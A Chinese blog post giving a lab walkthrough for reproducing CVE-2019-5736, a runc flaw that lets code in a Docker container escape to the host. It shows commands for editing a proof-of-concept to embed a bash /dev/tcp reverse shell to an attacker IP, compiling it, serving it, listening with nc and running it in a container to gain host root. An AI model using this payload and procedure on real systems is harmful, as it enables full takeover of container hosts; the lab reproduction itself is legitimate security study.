CVE漏洞复现-CVE-2019-5736 Docker逃逸

已于 2024-02-08 19:20:58 修改
阅读量438 收藏 5
点赞数 3
文章标签: docker 容器 运维
于 2024-02-08 19:16:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/air_rikka/article/details/136081077
版权

漏洞条件:

root运行Docker
Docker Version < 18.09.2
runc版本<=1.0-rc6

复现环境

kali10.0.0.200
centos10.0.0.50

一.kaili节点

1.执行以下命令,转到管理员

su root

2.执行以下命令,切换软件源

sudo bash -c "cat << EOF >> /etc/apt/sources.list 
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
EOF"

  

apt update

 

3.执行以下命令,下载go的编译环境

apt -y install golang

 

4.把脚本文件压缩包上传到家目录

脚本文件在文章开头,且附上百度网盘链接链接: 脚本文件

 

5.执行unzip CVE... Tab键补全

后面就是上传的文件名 

uzip 文件名

 

 得到一个跟解压包一样名字的的文件夹 

6. 进到该文件夹内

cd 文件名

 

 7.编辑文件main.go

vim main.go

进去后执行:set nu 

需要修改的内容在这个部分

在26行这里需要注释掉,添加//即可 

在26行后面添加

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.0.0.200/12345 0>&1" + shellCmd

ip和端口可以根据自己需要修改 

28行,第39行把/bin/sh  改为/bin/bash

 

保存退出

 执行

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

 出现绿色的main文件 

8.打开python服务,执行

python -m http.server 7987

9.到目前为止都是kali节点执行

二.在centos上执行

1.检查,执行

docker -v
docker-runc -v

符合要求即可 

2. 启动docker

service docker start

3.启动ubuntu容器

docker run -it ubuntu:18.04 "/bin/bash"

没有的话会帮你下一个ubuntu的镜像,执行exit退出

4.执行exit

exit

5.下载kali的main文件 

三.到kali节点

 1.停掉python服务

2.执行nc -lvnp 12345

四.到centos节点 

1.查看刚刚下载的ubuntu的名字

docker ps -a

找到ubuntu的前4位          //每个人的都不一样  

2.打开容器,执行

docker start f54d

 3.执行

docker cp ./main f54d:/home

 4.进入Docker bash,执行

docker exec -it f54d /bin/sh

//     分别执行图中命令

cd /home
ls

chmod 777 main
./main

 5.centos节点远程链接再开一个

 执行

docker exec -it f54d /bin/bash

五. 

centos第一个终端

kali取得centos的所有权限 

air_rikka
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
容器逃逸Docker runc(CVE-2019-5736漏洞复现与分析
SHELLCODE_8BIT的博客
08-08 927
【代码】Docker runc(cve-2019-5736漏洞复现与分析。
CVE-2019-5736-PoC验证环境需要的文件docker18.03,go1.9
10-20
CVE-2019-5736验证环境需要的文件 docker18.03 docker-ce-18.03.1.ce-1.el7.centos.x86_64.rpm docker-ce-19.03.9-3.el7.x86_64.rpm docker-ce-cli-19.03.9-3.el7.x86_64.rpm docker-ce-selinux-17.03.2.ce-1.el7....
安全漏洞-linux漏洞修复命令
明哥哥知识分享
02-21 1003
漏洞修复命令
CVE-2019-0708漏洞修复
大哥一声吼
05-24 5926
上午发现自己的小站(2008R2-x64)存在cve-2019-0708漏洞 根据微软官网的描述,此漏洞危害极大 所以做了一次运维的工作,亲自给自己的小站打个补丁 首先看一下漏洞检测poc的信息(打补丁前) 补丁下载地址:【不通系统请根据微软描述情况下载对应的补丁】 http://download.windowsupdate.com/d/msdownload/update/so...
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2596
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
云安全CVE漏洞复现-CVE-2019-5736 Docker逃逸
m0_75152875的博客
12-04 234
1.解释docker逃逸和镜像投毒 2.熟练掌握云安全CVE漏洞复现-CVE-2019-5736 Docker逃逸 3.详细介绍POC、EXP、Payload与Shellcode
docker逃逸漏洞复现CVE-2019-5736
热门推荐
网络安全。
01-29 1万+
0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x02 漏洞原理 漏洞点在于runC,RunC是一个容器运行时,最初是作为Docker的一部分开发的,后...
Docker逃逸漏洞复现CVE-2019-5736
blue_fantasy的博客
01-10 845
Text. 0x00 概述 2019年2月11日,runc的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x01 漏洞原理 漏洞点在于runc,runc是一个容器运行时,最初是作为Docker的一部分开发的,后来作为一个单独的开源工具和库被提取出来。作为“低级别”容器运行时,runc主
docker逃逸漏洞——CVE-2019-5736
a505964648的博客
02-15 706
Docker、containerd或者其他基于runc的容器运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作,来获取到宿主机的runc执行时的文件句柄,并修改掉runc的二进制文件,从而可以在宿主机上以root身份执行命令。docker runc容器逃逸漏洞CVE-2019-5736)发生在runc模块(也叫容器运行时)。编译poc(需要安装golang-go和gccgo-go)修改后的poc(记得将sh修改为bash启动)假设管理员进入docker容器。就可以看shell就反弹成功了。
Docker逃逸漏洞复现CVE-2019-5736)_踩坑记
qq_42383069的博客
04-25 2854
漏洞复现 1、安装漏洞环境(Ubuntu 18.04) 下载脚本并执行: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、执行完后查看版本信息 3、拉取镜像并启动 docker pull vulhub/shiro:1.2.4 docker run -d -p 8080:8080 --name sh
docker overlay扩容
kuun993的博客
05-15 196
overlay 使用率已接近100%,导致docker容器写不了数据。
[每周一更]-(第97期):认识Podman,并对比Docker
最新发布
hmx224_2014的专栏
05-19 922
Podman 和 Docker 都是流行的容器引擎,用于创建、运行和管理容器。此外,Podman 还支持 SELinux 和 AppArmor 等安全功能,可以进一步增强容器的安全性。在使用 Docker 之前,您需要先启动 Docker 守护进程,守护进程在后台运行,并负责容器的生命周期管理。例如,您可以使用 Buildah 构建自定义容器镜像,然后使用 Podman 运行这些镜像。Podman 的使用与 Docker 非常相似。例如,在内存不足的设备上运行容器时,Podman 可以提供更好的性能。
Docker:基础概念、常用命令
想听风雨的博客
05-17 497
Docker:基础概念、常用命令
前端 finalShell 与 docker 创建 服务连接 部署项目
lzfengquan的博客
05-14 1053
准备官网下载地址 要哪个下那个, 我的是第一个下载后 安装 打开选择 SSH 进行配置配置后点击确定即可1、yum install -y docker -y 表示不询问,使用默认配置进行安装检测版本 装最新的2、 yum list installed | grep docker 查看yum安装完成文件列表并筛选docker安装信息3、systemctl status docker 查看docker当前服务状态,active:inactive(dead)未开启,死亡状态。
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全造成严重威胁和损害。我们应该尊重他人的合法权益,遵守法律法规,远离黑客攻击等违法行为,共同维护网络安全。如果您需要更多关于该漏洞的信息,可以查阅相关的安全公告或 CVE 详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值